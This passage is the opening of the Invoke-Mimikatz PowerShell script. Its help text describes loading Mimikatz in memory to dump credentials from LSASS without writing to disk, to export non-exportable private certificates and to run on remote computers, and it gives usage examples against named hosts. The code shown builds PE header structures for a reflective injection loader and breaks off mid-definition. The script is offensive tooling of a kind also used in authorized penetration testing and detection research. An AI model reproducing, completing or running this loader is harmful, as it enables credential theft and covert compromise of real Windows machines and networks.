(12/14/2015)\n\n.DESCRIPTION\n\nReflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any \nfunctionality provided with Mimikatz.\n\n.PARAMETER DumpCreds\n\nSwitch: Use mimikatz to dump credentials out of LSASS.\n\n.PARAMETER DumpCerts\n\nSwitch: Use mimikatz to export all private certificates (even if they are marked non-exportable).\n\n.PARAMETER Command\n\nSupply mimikatz a custom command line. This works exactly the same as running the mimikatz executable like this: mimikatz \"privilege::debug exit\" as an example.\n\n.PARAMETER ComputerName\n\nOptional, an array of computernames to run the script on.\n\t\n.EXAMPLE\n\nExecute mimikatz on the local computer to dump certificates.\nInvoke-Mimikatz -DumpCerts\n\n.EXAMPLE\n\nExecute mimikatz on two remote computers to dump credentials.\nInvoke-Mimikatz -DumpCreds -ComputerName @(\"computer1\", \"computer2\")\n\n.EXAMPLE\n\nExecute mimikatz on a remote computer with the custom command \"privilege::debug exit\" which simply requests debug privilege and exits\nInvoke-Mimikatz -Command \"privilege::debug exit\" -ComputerName \"computer1\"\n\n.NOTES\nThis script was created by combining the Invoke-ReflectivePEInjection script written by Joe Bialek and the Mimikatz code written by Benjamin DELPY\nFind Invoke-ReflectivePEInjection at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection\nFind mimikatz at: http://blog.gentilkiwi.com\n\n.LINK\n\nhttp://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/\n#>\n\n[CmdletBinding(DefaultParameterSetName=\"DumpCreds\")]\nParam(\n\t[Parameter(Position = 0)]\n\t[String[]]\n\t$ComputerName,\n\n    [Parameter(ParameterSetName = \"DumpCreds\", Position = 1)]\n    [Switch]\n    $DumpCreds,\n\n    [Parameter(ParameterSetName = \"DumpCerts\", Position = 1)]\n    [Switch]\n    $DumpCerts,\n\n    [Parameter(ParameterSetName = \"CustomCommand\", Position = 1)]\n    [String]\n    $Command\n)\n\nSet-StrictMode -Version 2\n\n\n$RemoteScriptBlock = {\n\t[CmdletBinding()]\n\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[String]\n\t\t$PEBytes64,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n\t\t[String]\n\t\t$PEBytes32,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $false)]\n\t\t[String]\n\t\t$FuncReturnType,\n\t\t\t\t\n\t\t[Parameter(Position = 3, Mandatory = $false)]\n\t\t[Int32]\n\t\t$ProcId,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $false)]\n\t\t[String]\n\t\t$ProcName,\n\n        [Parameter(Position = 5, Mandatory = $false)]\n        [String]\n        $ExeArgs\n\t)\n\t\n\t###################################\n\t##########  Win32 Stuff  ##########\n\t###################################\n\tFunction Get-Win32Types\n\t{\n\t\t$Win32Types = New-Object System.Object\n\n\t\t#Define all the structures/enums that will be used\n\t\t#\tThis article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html\n\t\t$Domain = [AppDomain]::CurrentDomain\n\t\t$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')\n\t\t$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t\t$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)\n\t\t$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n\n\n\t\t############    ENUM    ############\n\t\t#Enum MachineType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null\n\t\t$MachineType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType\n\n\t\t#Enum MagicType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null\n\t\t$MagicType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType\n\n\t\t#Enum SubSystemType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null\n\t\t$SubSystemType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType\n\n\t\t#Enum DllCharacteristicsType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null\n\t\t$DllCharacteristicsType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType\n\n\t\t###########    STRUCT    ###########\n\t\t#Struct IMAGE_DATA_DIRECTORY\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)\n\t\t($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null\n\t\t($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t$IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY\n\n\t\t#Struct IMAGE_FILE_HEADER\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)\n\t\t$TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null\n\t\t$IMAGE_FILE_HEADER = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER\n\n\t\t#Struct IMAGE_OPTIONAL_HEADER64\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)\n\t\t($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null\n\t\t($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null\n\t\t($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null\n\t\t($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null\n\t\t($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null\n\t\t($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null\n\t\t($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null\n\t\t($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null\n\t\t($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null\n\t\t($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null\n\t\t($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null\n\t\t($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null\n\t\t($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null\n\t\t($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null\n\t\t($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null\n\t\t($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null\n\t\t($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null\n\t\t($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null\n\t\t($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null\n\t\t($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null\n\t\t($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null\n\t\t($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null\n\t\t($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null\n\t\t($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null\n\t\t($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null\n\t\t($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null\n\t\t$IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64\n\n\t\t#Struct IMAGE_OPTIONAL_HEADER32\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)\n\t\t($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null\n\t\t($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null\n\t\t($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null\n\t\t($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null\n\t\t($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null\n\t\t($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null\n\t\t($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null\n\t\t($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null\n\t\t($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null\n\t\t($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null\n\t\t($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null\n\t\t($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null\n\t\t($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null\n\t\t($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null\n\t\t($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null\n\t\t($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null\n\t\t($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null\n\t\t($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null\n\t\t($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null\n\t\t($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null\n\t\t($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null\n\t\t($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null\n\t\t($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null\n\t\t($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null\n\t\t($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null\n\t\t($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null\n\t\t$IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32\n\n\t\t#Struct IMAGE_NT_HEADERS64\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)\n\t\t$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null\n\t\t$IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64\n\t\t\n\t\t#Struct IMAGE_NT_HEADERS32\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)\n\t\t$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null\n\t\t$IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32\n\n\t\t#Struct IMAGE_DOS_HEADER\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)\n\t\t$TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null\n\n\t\t$e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')\n\t\t$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t$FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))\n\t\t$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))\n\t\t$e_resField.SetCustomAttribute($AttribBuilder)\n\n\t\t$TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null\n\n\t\t$e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')\n\t\t$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))\n\t\t$e_res2Field.SetCustomAttribute($AttribBuilder)\n\n\t\t$TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null\n\t\t$IMAGE_DOS_HEADER = $TypeBuilder.CreateType()\t\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER\n\n\t\t#Struct IMAGE_SECTION_HEADER\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)\n\n\t\t$nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')\n\t\t$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))\n\t\t$nameField.SetCustomAttribute($AttribBuilder)\n\n\t\t$TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER\n\n\t\t#Struct IMAGE_BASE_RELOCATION\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)\n\t\t$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION\n\n\t\t#Struct IMAGE_IMPORT_DESCRIPTOR\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_IMPORT_DESCRIPTOR = 